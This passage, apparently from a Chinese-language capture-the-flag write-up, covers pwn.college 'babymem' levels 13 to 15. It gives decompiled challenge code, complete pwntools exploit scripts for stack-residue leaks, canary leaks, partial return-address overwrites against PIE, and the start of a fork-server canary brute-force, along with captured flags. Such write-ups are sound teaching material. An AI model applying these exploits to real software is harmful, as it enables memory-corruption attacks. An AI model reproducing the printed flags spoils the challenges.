        context.binary = elf
24

25
        if debug:
26
            return gdb.debug(
27
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
28
            )
29
        else:
30
            return process([elf.path] + (argv or []), env=envp)
31
    else:
32
        return remote(HOST, PORT)
33

34

35
backdoor = b"REPEAT "
36
backdoor_trigger = b"".ljust(0x82, b"A") + backdoor
37
padding_to_canary = b"".ljust(0x88, b"A")
38
padding_to_ret = b"".ljust(0x8, b"A")
39
fixed_offset = b"\xcd"
40
possible_bytes = [bytes([i]) for i in range(0x03, 0x103, 0x10)]
41

42

43
def send_payload(target, payload):
44
    try:
45
        payload_size = f"{len(payload)}".encode()
46

47
        target.sendlineafter(b"Payload size: ", payload_size)
48
        target.sendafter(b"Send your payload", payload)
49
    except Exception as e:
50
        log.exception(f"An error occurred while sending payload: {e}")
51

52

53
def leak_canary(target):
54
    try:
55
        send_payload(target, backdoor_trigger)
56
        target.recvuntil(backdoor)
57

58
        canary = b"\x00" + target.recv(0x7)
59
        log.success(f"Canary: {to_hex_bytes(canary)}")
60

61
        return canary
62
    except Exception as e:
63
log.exception(f"An error occurred while leaking canary: {e}")
64

65

66
def construct_payload(target):
67
    canary = leak_canary(target)
68

69
    payload = padding_to_canary
70
    payload += canary
71
    payload += padding_to_ret
72
    payload += fixed_offset + random.choice(possible_bytes)
73

74
    return payload
75

76

77
def attack(target, payload):
78
    try:
79
        send_payload(target, payload)
80

81
        response = target.recvall()
82

83
        return b"pwn.college{" in response
84
    except Exception as e:
85
        log.exception(f"An error occurred while performing attack: {e}")
86

87

88
def main():
89
    while True:
90
        target = launch()
91

92
        try:
93
            payload = construct_payload(target)
94

95
            if attack(target, payload):
96
                log.success("Success! Exiting...")
97

98
                pause()
99
                exit()
100
            else:
101
                target.close()
102
                target = launch()
103
        except Exception as e:
104
            log.exception(f"An error occurred in main loop: {e}")
105

106

107
if __name__ == "__main__":
108
    main()

Flag

Flag: pwn.college{Q8RGfsaRLXQyi0mLIgR3c7-_jYK.0lMxMDL5cTNxgzW}

Level 13.0

Information

Category: Pwn

Description

Leak data left behind unintentionally by utilizing clever payload construction.

Write-up

1
int verify_flag()
2
{
3
  int v0; // eax
4
  _BYTE v2[279]; // [rsp+79h] [rbp-117h] BYREF
5

6
  *(_QWORD *)&v2[271] = __readfsqword(0x28u);
7
  v0 = open("/flag", 0);
8
  read(v0, v2, 0x100uLL);
9
  puts(
10
    "This challenge reads the flag file to verify it. Do you think this might leave traces of the flag around afterwards?\n");
11
  return printf("The flag was read into address %p.\n\n", v2);
12
}

这题没啥好说的吧，完全就是 verify_flag 把 flag 读到栈上了，然后我们用垃圾数据填充到 flag 头就好了，printf("You said: %.360s\n", (const char *)buf); 会输出一切……

Exploit

1
#!/usr/bin/python3
2

3
from pwn import ELF, context, gdb, log, process, remote
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babymem-level-13-0"
8
HOST, PORT = "pwn.college", 1337
9

10
gdbscript = """
11
b *verify_flag+75
12
b *challenge+1429
13
b *challenge+1932
14
c
15
"""
16

17

18
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
19
    if local:
20
        elf = ELF(FILE)
21
        context.binary = elf
22

23
        if debug:
24
            return gdb.debug(
25
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
26
            )
27
        else:
28
            return process([elf.path] + (argv or []), env=envp)
29
    else:
30
        return remote(HOST, PORT)
31

32

33
padding_to_flag = b"".ljust(0x59, b"A")
34

35

36
def send_payload(target, payload):
37
    try:
38
        payload_size = f"{len(payload)}".encode()
39

40
        target.sendlineafter(b"Payload size: ", payload_size)
41
        target.sendafter(b"Send your payload", payload)
42
    except Exception as e:
43
        log.exception(f"An error occurred while sending payload: {e}")
44

45

46
def construct_payload():
47
    payload = padding_to_flag
48

49
    return payload
50

51

52
def leak_flag(target, payload):
53
    try:
54
        send_payload(target, payload)
55

56
        target.recvuntil(b"pwn.college{")
57

58
        flag = b"pwn.college{" + target.recvuntil(b"}")
59

60
        log.success(f"Flag successfully leaked: {flag}")
61
    except Exception as e:
62
        log.exception(f"An error occurred while performing leak_flag: {e}")
63

64

65
def main():
66
    target = launch(debug=False)
67

68
    payload = construct_payload()
69

70
    leak_flag(target, payload)
71

72

73
if __name__ == "__main__":
74
    main()

Flag

Flag: pwn.college{YkKrgg8qd3Vyt4OOrpBqwsAEJ2g.01MxMDL5cTNxgzW}

Level 13.1

Information

Category: Pwn

Description

Leak data left behind unintentionally by utilizing clever payload construction.

Write-up

和上题一样，重新计算一下偏移就好了。

Exploit

1
#!/usr/bin/python3
2

3
from pwn import ELF, context, gdb, log, process, remote
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babymem-level-13-1"
8
HOST, PORT = "pwn.college", 1337
9

10
gdbscript = """
11
b *verify_flag+75
12
b *challenge+168
13
c
14
"""
15

16

17
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
18
    if local:
19
        elf = ELF(FILE)
20
        context.binary = elf
21

22
        if debug:
23
            return gdb.debug(
24
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
25
            )
26
        else:
27
            return process([elf.path] + (argv or []), env=envp)
28
    else:
29
        return remote(HOST, PORT)
30

31

32
padding_to_flag = b"".ljust(0x8A, b"A")
33

34

35
def send_payload(target, payload):
36
    try:
37
        payload_size = f"{len(payload)}".encode()
38

39
        target.sendlineafter(b"Payload size: ", payload_size)
40
        target.sendafter(b"Send your payload", payload)
41
    except Exception as e:
42
        log.exception(f"An error occurred while sending payload: {e}")
43

44

45
def construct_payload():
46
    payload = padding_to_flag
47

48
    return payload
49

50

51
def leak_flag(target, payload):
52
    try:
53
        send_payload(target, payload)
54

55
        target.recvuntil(b"pwn.college{")
56

57
        flag = b"pwn.college{" + target.recvuntil(b"}")
58

59
        log.success(f"Flag successfully leaked: {flag}")
60
    except Exception as e:
61
        log.exception(f"An error occurred while performing leak_flag: {e}")
62

63

64
def main():
65
    target = launch(debug=False)
66

67
    payload = construct_payload()
68

69
    leak_flag(target, payload)
70

71

72
if __name__ == "__main__":
73
    main()

Flag

Flag: pwn.college{gscSxVngZ4uaJ8tU3A-fhqwrLIM.0FNxMDL5cTNxgzW}

Level 14.0

Information

Category: Pwn

Description

Leak data left behind unintentionally to defeat a stack canary in a PIE binary.

Write-up


107 collapsed lines
1
__int64 __fastcall challenge(unsigned int a1, __int64 a2, __int64 a3)
2
{
3
  int *v3; // rax
4
  char *v4; // rax
5
  __int64 v6; // [rsp+0h] [rbp-1E0h] BYREF
6
  __int64 v7; // [rsp+8h] [rbp-1D8h]
7
  __int64 v8; // [rsp+10h] [rbp-1D0h]
8
  unsigned int v9; // [rsp+1Ch] [rbp-1C4h]
9
  int v10; // [rsp+2Ch] [rbp-1B4h]
10
  size_t nbytes; // [rsp+30h] [rbp-1B0h] BYREF
11
  void *buf; // [rsp+38h] [rbp-1A8h]
12
  char v13; // [rsp+40h] [rbp-1A0h] BYREF
13
  unsigned __int64 v14; // [rsp+1D8h] [rbp-8h]
14
  __int64 savedregs; // [rsp+1E0h] [rbp+0h] BYREF
15
  _UNKNOWN *retaddr; // [rsp+1E8h] [rbp+8h] BYREF
16

17
  v9 = a1;
18
  v8 = a2;
19
  v7 = a3;
20
  v14 = __readfsqword(0x28u);
21
  buf = &v13;
22
  nbytes = 0LL;
23
  puts("The challenge() function has just been launched!");
24
  puts("However... An important initialization step was missed.");
25
  puts("Use this to your advantage!");
26
  puts(byte_3284);
27
  sp_ = (__int64)&v6;
28
  bp_ = (__int64)&savedregs;
29
  sz_ = ((unsigned __int64)((char *)&savedregs - (char *)&v6) >> 3) + 2;
30
  rp_ = (__int64)&retaddr;
31
  puts("Before we do anything, let's take a look at challenge()'s stack frame:");
32
  DUMP_STACK(sp_, sz_);
33
  printf("Our stack pointer points to %p, and our base pointer points to %p.\n", (const void *)sp_, (const void *)bp_);
34
  printf("This means that we have (decimal) %d 8-byte words in our stack frame,\n", sz_);
35
  puts("including the saved base pointer and the saved return address, for a");
36
  printf("total of %d bytes.\n", 8 * sz_);
37
  printf("The input buffer begins at %p, partway through the stack frame,\n", buf);
38
  puts("(\"above\" it in the stack are other local variables used by the function).");
39
  puts("Your input will be read into this buffer.");
40
  printf("The buffer is %d bytes long, but the program will let you provide an arbitrarily\n", 407);
41
  puts("large input length, and thus overflow the buffer.\n");
42
  puts("In this level, there is no \"win\" variable.");
43
  puts("You will need to force the program to execute the win_authed() function");
44
  puts("by directly overflowing into the stored return address back to main,");
45
  printf(
46
    "which is stored at %p, %d bytes after the start of your input buffer.\n",
47
    (const void *)rp_,
48
    rp_ - (_DWORD)buf);
49
  printf(
50
    "That means that you will need to input at least %d bytes (%d to fill the buffer,\n",
51
    rp_ - (_DWORD)buf + 8,
52
    407);
53
  printf("%d to fill other stuff stored between the buffer and the return address,\n", rp_ - (_DWORD)buf - 407);
54
  puts("and 8 that will overwrite the return address).\n");
55
  cp_ = bp_;
56
  cv_ = __readfsqword(0x28u);
57
  while ( *(_QWORD *)cp_ != cv_ )
58
    cp_ -= 8LL;
59
  puts("Because the binary is position independent, you cannot know");
60
  puts("exactly where the win_authed() function is located.");
61
  puts("This means that it is not clear what should be written into the return address.\n");
62
  printf("Payload size: ");
63
  __isoc99_scanf("%lu", &nbytes);
64
  printf("You have chosen to send %lu bytes of input!\n", nbytes);
65
  printf("This will allow you to write from %p (the start of the input buffer)\n", buf);
66
  printf(
67
    "right up to (but not including) %p (which is %d bytes beyond the end of the buffer).\n",
68
    (char *)buf + nbytes,
69
    nbytes - 407);
70
  printf("Of these, you will overwrite %d bytes into the return address.\n", nbytes + (_DWORD)buf - rp_);
71
  puts("If that number is greater than 8, you will overwrite the entire return address.\n");
72
  puts("Overwriting the entire return address is fine when we know");
73
  puts("the whole address, but here, we only really know the last three nibbles.");
74
  puts("These nibbles never change, because pages are aligned to 0x1000.");
75
  puts("This gives us a workaround: we can overwrite the least significant byte");
76
  puts("of the saved return address, which we can know from debugging the binary,");
77
  puts("to retarget the return to main to any instruction that shares the other 7 bytes.");
78
  puts("Since that last byte will be constant between executions (due to page alignment),");
79
  puts("this will always work.");
80
  puts("If the address we want to redirect execution to is a bit farther away from");
81
  puts("the saved return address, and we need to write two bytes, then one of those");
82
  puts("nibbles (the fourth least-significant one) will be a guess, and it will be");
83
  puts("incorrect 15 of 16 times.");
84
  puts("This is okay: we can just run our exploit a few times until it works");
85
  puts("(statistically, ~50% chance after 11 times and ~90% chance after 36 times).");
86
  puts("One caveat in this challenge is that the win_authed() function must first auth:");
87
  puts("it only lets you win if you provide it with the argument 0x1337.");
88
  puts("Speifically, the win_authed() function looks something like:");
89
  puts("    void win_authed(int token)");
90
  puts("    {");
91
  puts("      if (token != 0x1337) return;");
92
  puts("      puts(\"You win! Here is your flag: \");");
93
  puts("      sendfile(1, open(\"/flag\", 0), 0, 256);");
94
  puts("      puts(\"\");");
95
  puts("    }");
96
  puts(byte_3284);
97
  puts("So how do you pass the check? There *is* a way, and we will cover it later,");
98
  puts("but for now, we will simply bypass it! You can overwrite the return address");
99
  puts("with *any* value (as long as it points to executable code), not just the start");
100
  puts("of functions. Let's overwrite past the token check in win!\n");
101
  puts("To do this, we will need to analyze the program with objdump, identify where");
102
  puts("the check is in the win_authed() function, find the address right after the check,");
103
  puts("and write that address over the saved return address.\n");
104
  puts("Go ahead and find this address now. When you're ready, input a buffer overflow");
105
  printf(
106
    "that will overwrite the saved return address (at %p, %d bytes into the buffer)\n",
107
    (const void *)rp_,
108
    rp_ - (_DWORD)buf);
109
  puts("with the correct value.\n");
110
  printf("Send your payload (up to %lu bytes)!\n", nbytes);
111
  v10 = read(0, buf, nbytes);
112
  if ( v10 < 0 )
113
  {
114
    v3 = __errno_location();
24 collapsed lines
115
    v4 = strerror(*v3);
116
    printf("ERROR: Failed to read input -- %s!\n", v4);
117
    exit(1);
118
  }
119
  printf("You sent %d bytes!\n", v10);
120
  puts("Let's see what happened with the stack:\n");
121
  DUMP_STACK(sp_, sz_);
122
  puts("The program's memory status:");
123
  printf("- the input buffer starts at %p\n", buf);
124
  printf("- the saved frame pointer (of main) is at %p\n", (const void *)bp_);
125
  printf("- the saved return address (previously to main) is at %p\n", (const void *)rp_);
126
  printf("- the saved return address is now pointing to %p.\n", *(const void **)rp_);
127
  printf("- the canary is stored at %p.\n", (const void *)cp_);
128
  printf("- the canary value is now %p.\n", *(const void **)cp_);
129
  printf("- the address of win_authed() is %p.\n", win_authed);
130
  putchar(10);
131
  puts("If you have managed to overwrite the return address with the correct value,");
132
  puts("challenge() will jump straight to win_authed() when it returns.");
133
  printf("Let's try it now!\n\n");
134
  if ( (unsigned __int64)buf + v10 > rp_ + 2 )
135
  {
136
    puts("WARNING: You sent in too much data, and overwrote more than two bytes of the address.");
137
    puts("         This can still work, because I told you the correct address to use for");
138
    puts("         this execution, but you should not rely on that information.");
139
    puts("         You can solve this challenge by only overwriting two bytes!");
140
    puts("         ");
141
  }
142
  printf("You said: %.407s\n", (const char *)buf);
143
  puts("This challenge has a trick hidden in its code. Reverse-engineer the binary right after this puts()");
144
  puts("call to see the hidden backdoor!");
145
  if ( strstr((const char *)buf, "REPEAT") )
146
  {
147
    puts("Backdoor triggered! Repeating challenge()");
148
    return challenge(v9, v8, v7);
149
  }
150
  else
151
  {
152
    puts("Goodbye!");
3 collapsed lines
153
    return 0LL;
154
  }
155
}

这题就是前面几个 level 的结合体。唯一的不同之处在于，这次 canary 和其它一些数据以残留数据的形式出现在 challenge 创建的栈帧内部，我们只要把这个残留的 canary 泄漏出来就好了。至于 challenge 本身的 canary，我们泄漏不了。所以其实出题人的本意就是想让我们泄漏栈上的残留数据，为此对泄漏 challenge 原本的 canary 的途径做了限制。

至于我是如何发现残留数据这一事实的，是通过动态调试，凭借对 canary 敏锐的洞察力发现的 LMAO。咱就是说对数据的敏感度也很重要哦～

为了避免这种残留数据/栈帧复用的问题，我们每次分配完栈空间后都应该通过类似 memset 的方法清空栈内容才对。所以，如果没有 memset 的，就可以想想会不会有泄漏残留数据的可能了。

Exploit

1
#!/usr/bin/python3
2

3
from pwn import ELF, context, gdb, log, pause, process, random, remote
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babymem-level-14-0"
8
HOST, PORT = "pwn.college", 1337
9

10
gdbscript = """
11
c
12
"""
13

14

15
def to_hex_bytes(data):
16
    return "".join(f"\\x{byte:02x}" for byte in data)
17

18

19
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
20
    if local:
21
        elf = ELF(FILE)
22
        context.binary = elf
23

24
        if debug:
25
            return gdb.debug(
26
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
27
            )
28
        else:
29
            return process([elf.path] + (argv or []), env=envp)
30
    else:
31
        return remote(HOST, PORT)
32

33

34
backdoor = b"REPEAT "
35
backdoor_trigger = b"".ljust(0x82, b"A") + backdoor
36
padding_to_canary = b"".ljust(0x198, b"A")
37
padding_to_ret = b"".ljust(0x8, b"A")
38
fixed_offset = b"\xd4"
39
possible_bytes = [bytes([i]) for i in range(0xF, 0x10F, 0x10)]
40

41

42
def send_payload(target, payload):
43
    try:
44
        payload_size = f"{len(payload)}".encode()
45

46
        target.sendlineafter(b"Payload size: ", payload_size)
47
        target.sendafter(b"Send your payload", payload)
48
    except Exception as e:
49
        log.exception(f"An error occurred while sending payload: {e}")
50

51

52
def leak_canary(target):
53
    try:
54
        send_payload(target, backdoor_trigger)
55
        target.recvuntil(backdoor)
56

57
        canary = b"\x00" + target.recv(0x7)
58
        log.success(f"Canary: {to_hex_bytes(canary)}")
59

60
        return canary
61
    except Exception as e:
62
        log.exception(f"An error occurred while leaking canary: {e}")
63

64

65
def construct_payload(target):
66
    canary = leak_canary(target)
67

68
    payload = padding_to_canary
69
    payload += canary
70
    payload += padding_to_ret
71
    payload += fixed_offset + random.choice(possible_bytes)
72

73
    return payload
74

75

76
def attack(target, payload):
77
    try:
78
        send_payload(target, payload)
79

80
        response = target.recvall()
81

82
        return b"You win!" in response
83
    except Exception as e:
84
        log.exception(f"An error occurred while performing leak_flag: {e}")
85

86

87
def main():
88
    while True:
89
        target = launch(debug=False)
90

91
        try:
92
            payload = construct_payload(target)
93

94
            if attack(target, payload):
95
                log.success("Success! Exiting...")
96

97
                pause()
98
                exit()
99
            else:
100
                target.close()
101
                target = launch()
102
        except Exception as e:
103
            log.exception(f"An error occurred in main loop: {e}")
104

105

106
if __name__ == "__main__":
107
    main()

Flag

Flag: pwn.college{chm7VMiV6dZ3oBKDhVUhtvXg3kb.0VNxMDL5cTNxgzW}

Level 14.1

Information

Category: Pwn

Description

Leak data left behind unintentionally to defeat a stack canary in a PIE binary.

Write-up

和上题一样，重新找一下偏移和返回地址就好啦。

Exploit

1
#!/usr/bin/python3
2

3
from pwn import ELF, context, gdb, log, pause, process, random, remote
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babymem-level-14-1"
8
HOST, PORT = "pwn.college", 1337
9

10
gdbscript = """
11
b *challenge+168
12
c
13
"""
14

15

16
def to_hex_bytes(data):
17
    return "".join(f"\\x{byte:02x}" for byte in data)
18

19

20
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
21
    if local:
22
        elf = ELF(FILE)
23
        context.binary = elf
24

25
        if debug:
26
            return gdb.debug(
27
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
28
            )
29
        else:
30
            return process([elf.path] + (argv or []), env=envp)
31
    else:
32
        return remote(HOST, PORT)
33

34

35
backdoor = b"REPEAT "
36
backdoor_trigger = b"".ljust(0x72, b"A") + backdoor
37
padding_to_canary = b"".ljust(0x188, b"A")
38
padding_to_ret = b"".ljust(0x8, b"A")
39
fixed_offset = b"\x7d"
40
possible_bytes = [bytes([i]) for i in range(0x8, 0x108, 0x10)]
41

42

43
def send_payload(target, payload):
44
    try:
45
        payload_size = f"{len(payload)}".encode()
46

47
        target.sendlineafter(b"Payload size: ", payload_size)
48
        target.sendafter(b"Send your payload", payload)
49
    except Exception as e:
50
        log.exception(f"An error occurred while sending payload: {e}")
51

52

53
def leak_canary(target):
54
    try:
55
        send_payload(target, backdoor_trigger)
56
        target.recvuntil(backdoor)
57

58
        canary = b"\x00" + target.recv(0x7)
59
        log.success(f"Canary: {to_hex_bytes(canary)}")
60

61
        return canary
62
    except Exception as e:
63
        log.exception(f"An error occurred while leaking canary: {e}")
64

65

66
def construct_payload(target):
67
    canary = leak_canary(target)
68

69
    payload = padding_to_canary
70
    payload += canary
71
    payload += padding_to_ret
72
    payload += fixed_offset + random.choice(possible_bytes)
73

74
    return payload
75

76

77
def attack(target, payload):
78
    try:
79
        send_payload(target, payload)
80

81
        response = target.recvall()
82

83
        return b"You win!" in response
84
    except Exception as e:
85
        log.exception(f"An error occurred while performing leak_flag: {e}")
86

87

88
def main():
89
    while True:
90
        target = launch(debug=False)
91

92
        try:
93
            payload = construct_payload(target)
94

95
            if attack(target, payload):
96
                log.success("Success! Exiting...")
97

98
                pause()
99
                exit()
100
            else:
101
                target.close()
102
                target = launch()
103
        except Exception as e:
104
            log.exception(f"An error occurred in main loop: {e}")
105

106

107
if __name__ == "__main__":
108
    main()

Flag

Flag: pwn.college{E_7686TOh__Z7NZeXfOPaMP5YfJ.0lNxMDL5cTNxgzW}

Level 15.0

Information

Category: Pwn

Description

Defeat a stack canary in a PIE binary by utilizing a network-style fork server in the target binary.

Write-up

1
int __fastcall main(int argc, const char **argv, const char **envp)
2
{
3
  int optval; // [rsp+24h] [rbp-101Ch] BYREF
4
  int fd; // [rsp+28h] [rbp-1018h]
5
  int v7; // [rsp+2Ch] [rbp-1014h]
6
  sockaddr addr; // [rsp+30h] [rbp-1010h] BYREF
7
  unsigned __int64 v9; // [rsp+1038h] [rbp-8h]
8

9
  v9 = __readfsqword(0x28u);
10
  setvbuf(stdin, 0LL, 2, 0LL);
11
  setvbuf(stdout, 0LL, 2, 0LL);
12
  puts("###");
13
  printf("### Welcome to %s!\n", *argv);
14
  puts("###");
15
  putchar(10);
16
  puts("This challenge is listening for connections on TCP port 1337.\n");
17
  puts("The challenge supports unlimited sequential connections.\n");
18
  fd = socket(2, 1, 0);
19
  optval = 1;
20
  setsockopt(fd, 1, 2, &optval, 4u);
21
  addr.sa_family = 2;
22
  *(_DWORD *)&addr.sa_data[2] = 0;
23
  *(_WORD *)addr.sa_data = htons(0x539u);
24
  bind(fd, &addr, 0x10u);
25
  listen(fd, 1);
26
  while ( 1 )
27
  {
28
    v7 = accept(fd, 0LL, 0LL);
29
    if ( !fork() )
30
      break;
31
    close(v7);
32
    wait(0LL);
33
  }
34
  dup2(v7, 0);
35
  dup2(v7, 1);
36
  dup2(v7, 2);
37
  close(fd);
38
  close(v7);
39
  challenge((unsigned int)argc, argv, envp);
40
  puts("### Goodbye!");
41
  return 0;
42
}

观察这个 main 函数我们可知，它所做的大致就是持续监听 1337 端口，连上了就创建一个子进程执行 challenge。


126 collapsed lines
1
__int64 __fastcall challenge(int a1, __int64 a2, __int64 a3)
2
{
3
  int *v3; // rax
4
  char *v4; // rax
5
  _QWORD v6[3]; // [rsp+0h] [rbp-C0h] BYREF
6
  int v7; // [rsp+1Ch] [rbp-A4h]
7
  int v8; // [rsp+2Ch] [rbp-94h]
8
  size_t nbytes; // [rsp+30h] [rbp-90h] BYREF
9
  void *buf; // [rsp+38h] [rbp-88h]
10
  _QWORD v11[13]; // [rsp+40h] [rbp-80h] BYREF
11
  __int16 v12; // [rsp+A8h] [rbp-18h]
12
  unsigned __int64 v13; // [rsp+B8h] [rbp-8h]
13
  __int64 savedregs; // [rsp+C0h] [rbp+0h] BYREF
14
  _UNKNOWN *retaddr; // [rsp+C8h] [rbp+8h] BYREF
15

16
  v7 = a1;
17
  v6[2] = a2;
18
  v6[1] = a3;
19
  v13 = __readfsqword(0x28u);
20
  memset(v11, 0, sizeof(v11));
21
  v12 = 0;
22
  buf = v11;
23
  nbytes = 0LL;
24
  puts("The challenge() function has just been launched!");
25
  sp_ = (__int64)v6;
26
  bp_ = (__int64)&savedregs;
27
  sz_ = ((unsigned __int64)((char *)&savedregs - (char *)v6) >> 3) + 2;
28
  rp_ = (__int64)&retaddr;
29
  puts("Before we do anything, let's take a look at challenge()'s stack frame:");
30
  DUMP_STACK(sp_, sz_);
31
  printf("Our stack pointer points to %p, and our base pointer points to %p.\n", (const void *)sp_, (const void *)bp_);
32
  printf("This means that we have (decimal) %d 8-byte words in our stack frame,\n", sz_);
33
  puts("including the saved base pointer and the saved return address, for a");
34
  printf("total of %d bytes.\n", 8 * sz_);
35
  printf("The input buffer begins at %p, partway through the stack frame,\n", buf);
36
  puts("(\"above\" it in the stack are other local variables used by the function).");
37
  puts("Your input will be read into this buffer.");
38
  printf("The buffer is %d bytes long, but the program will let you provide an arbitrarily\n", 106);
39
  puts("large input length, and thus overflow the buffer.\n");
40
  puts("In this level, there is no \"win\" variable.");
41
  puts("You will need to force the program to execute the win_authed() function");
42
  puts("by directly overflowing into the stored return address back to main,");
43
  printf(
44
    "which is stored at %p, %d bytes after the start of your input buffer.\n",
45
    (const void *)rp_,
46
    rp_ - (_DWORD)buf);
47
  printf(
48
    "That means that you will need to input at least %d bytes (%d to fill the buffer,\n",
49
    rp_ - (_DWORD)buf + 8,
50
    106);
51
  printf("%d to fill other stuff stored between the buffer and the return address,\n", rp_ - (_DWORD)buf - 106);
52
  puts("and 8 that will overwrite the return address).\n");
53
  cp_ = bp_;
54
  cv_ = __readfsqword(0x28u);
55
  while ( *(_QWORD *)cp_ != cv_ )
56
    cp_ -= 8LL;
57
  puts("While canaries are enabled, this networked program forks.");
58
  puts("What is important to note is that the canary does not get re-randomized on fork.\n");
59
  puts("When data that you are overflowing into is critical (i.e., if you screw it up");
60
  puts("the program crashes), but also static across executions, you can brute-force");
61
  puts("it byte by byte over many attempts.\n");
62
  puts("So, let's brute-force the canary!");
63
  puts("If this is your first time running this program, all you know so far is that");
64
  puts("the canary has a 0 as its left-most byte.");
65
  puts("You should proceed like this:\n");
66
  puts("- First, you should try overflowing just the null byte of the canary, for");
67
  printf("  practice. The canary starts at %p, which is %d bytes after the\n", (const void *)cp_, cp_ - (_DWORD)buf);
68
  printf("  start of your buffer. Thus, you should provide %d characters followed\n", cp_ - (_DWORD)buf);
69
  puts("  by a NULL byte, make sure the canary check passes, then try a non-NULL");
70
  puts("  byte and make sure the canary check fails. This will confirm the offsets.");
71
  puts("- Next try each possible value for just the next byte. One of them (the same");
72
  puts("  as whatever was there in memory already) will keep the canary intact, and");
73
  puts("  when the canary check succeeds, you know you have found the correct one.");
74
  puts("- Go on to the next byte, leak it the same way, and so on, until you have");
75
  puts("  the whole canary.\n");
76
  puts("You will likely want to script this process! Each byte might take up to 256");
77
  puts("tries to guess..\n");
78
  puts("Because the binary is position independent, you cannot know");
79
  puts("exactly where the win_authed() function is located.");
80
  puts("This means that it is not clear what should be written into the return address.\n");
81
  printf("Payload size: ");
82
  __isoc99_scanf("%lu", &nbytes);
83
  printf("You have chosen to send %lu bytes of input!\n", nbytes);
84
  printf("This will allow you to write from %p (the start of the input buffer)\n", buf);
85
  printf(
86
    "right up to (but not including) %p (which is %d bytes beyond the end of the buffer).\n",
87
    (char *)buf + nbytes,
88
    nbytes - 106);
89
  printf("Of these, you will overwrite %d bytes into the return address.\n", nbytes + (_DWORD)buf - rp_);
90
  puts("If that number is greater than 8, you will overwrite the entire return address.\n");
91
  puts("Overwriting the entire return address is fine when we know");
92
  puts("the whole address, but here, we only really know the last three nibbles.");
93
  puts("These nibbles never change, because pages are aligned to 0x1000.");
94
  puts("This gives us a workaround: we can overwrite the least significant byte");
95
  puts("of the saved return address, which we can know from debugging the binary,");
96
  puts("to retarget the return to main to any instruction that shares the other 7 bytes.");
97
  puts("Since that last byte will be constant between executions (due to page alignment),");
98
  puts("this will always work.");
99
  puts("If the address we want to redirect execution to is a bit farther away from");
100
  puts("the saved return address, and we need to write two bytes, then one of those");
101
  puts("nibbles (the fourth least-significant one) will be a guess, and it will be");
102
  puts("incorrect 15 of 16 times.");
103
  puts("This is okay: we can just run our exploit a few times until it works");
104
  puts("(statistically, ~50% chance after 11 times and ~90% chance after 36 times).");
105
  puts("One caveat in this challenge is that the win_authed() function must first auth:");
106
  puts("it only lets you win if you provide it with the argument 0x1337.");
107
  puts("Speifically, the win_authed() function looks something like:");
108
  puts("    void win_authed(int token)");
109
  puts("    {");
110
  puts("      if (token != 0x1337) return;");
111
  puts("      puts(\"You win! Here is your flag: \");");
112
  puts("      sendfile(1, open(\"/flag\", 0), 0, 256);");
113
  puts("      puts(\"\");");
114
  puts("    }");
115
  puts(byte_43BB);
116
  puts("So how do you pass the check? There *is* a way, and we will cover it later,");
117
  puts("but for now, we will simply bypass it! You can overwrite the return address");
118
  puts("with *any* value (as long as it points to executable code), not just the start");
119
  puts("of functions. Let's overwrite past the token check in win!\n");
120
  puts("To do this, we will need to analyze the program with objdump, identify where");
121
  puts("the check is in the win_authed() function, find the address right after the check,");
122
  puts("and write that address over the saved return address.\n");
123
  puts("Go ahead and find this address now. When you're ready, input a buffer overflow");
124
  printf(
125
    "that will overwrite the saved return address (at %p, %d bytes into the buffer)\n",
126
    (const void *)rp_,
127
    rp_ - (_DWORD)buf);
128
  puts("with the correct value.\n");
129
  printf("Send your payload (up to %lu bytes)!\n", nbytes);
130
  v8 = read(0, buf, nbytes);
131
  if ( v8 < 0 )
132
  {
133
    v3 = __errno_location();
30 collapsed lines
134
    v4 = strerror(*v3);
135
    printf("ERROR: Failed to read input -- %s!\n", v4);
136
    exit(1);
137
  }
138
  printf("You sent %d bytes!\n", v8);
139
  puts("Let's see what happened with the stack:\n");
140
  DUMP_STACK(sp_, sz_);
141
  puts("The program's memory status:");
142
  printf("- the input buffer starts at %p\n", buf);
143
  printf("- the saved frame pointer (of main) is at %p\n", (const void *)bp_);
144
  printf("- the saved return address (previously to main) is at %p\n", (const void *)rp_);
145
  printf("- the saved return address is now pointing to %p.\n", *(const void **)rp_);
146
  printf("- the canary is stored at %p.\n", (const void *)cp_);
147
  printf("- the canary value is now %p.\n", *(const void **)cp_);
148
  printf("- the address of win_authed() is %p.\n", win_authed);
149
  putchar(10);
150
  puts("If you have managed to overwrite the return address with the correct value,");
151
  puts("challenge() will jump straight to win_authed() when it returns.");
152
  printf("Let's try it now!\n\n");
153
  if ( (unsigned __int64)buf + v8 > rp_ + 2 )
154
  {
155
    puts("WARNING: You sent in too much data, and overwrote more than two bytes of the address.");
156
    puts("         This can still work, because I told you the correct address to use for");
157
    puts("         this execution, but you should not rely on that information.");
158
    puts("         You can solve this challenge by only overwriting two bytes!");
159
    puts("         ");
160
  }
161
  puts("Goodbye!");
162
  return 0LL;
163
}

这个 challenge 也没啥好说的，存在一个栈溢出。

因为我们的子进程都是由主进程生成的，所以每个子进程都会持有和主进程相同的 canary 值。利用这点加上栈溢出漏洞，我们可以爆破 canary。这是个 64-bits 程序，我们实际只要爆破 56-bits，所以爆破时间不会很长。

把 canary 爆出来后，就可以去快乐的覆盖返回地址了。因为有 PIE 保护，所以我们还得猜倒数第四个 nibble，不过我相信这对你来说也是一件很轻松的事情～

Exploit

1
#!/usr/bin/python3
2

3
import os
4
import subprocess
5
import time
6

7
import psutil
8
from pwn import ELF, context, gdb, log, pause, process, random, remote, sleep
9

10
context(log_level="debug", terminal="kitty")
11

12
FILE = "./babymem-level-15-0"
13
HOST, PORT = "localhost", 1337
14

15
gdbscript = """
16
set follow-fork-mode child
17
b *challenge+1807
18
c
19
"""
20

21

22
def to_hex_bytes(data):
23
    return "".join(f"\\x{byte:02x}" for byte in data)
24

25

26
def get_forked_pid(parent_pid):
27
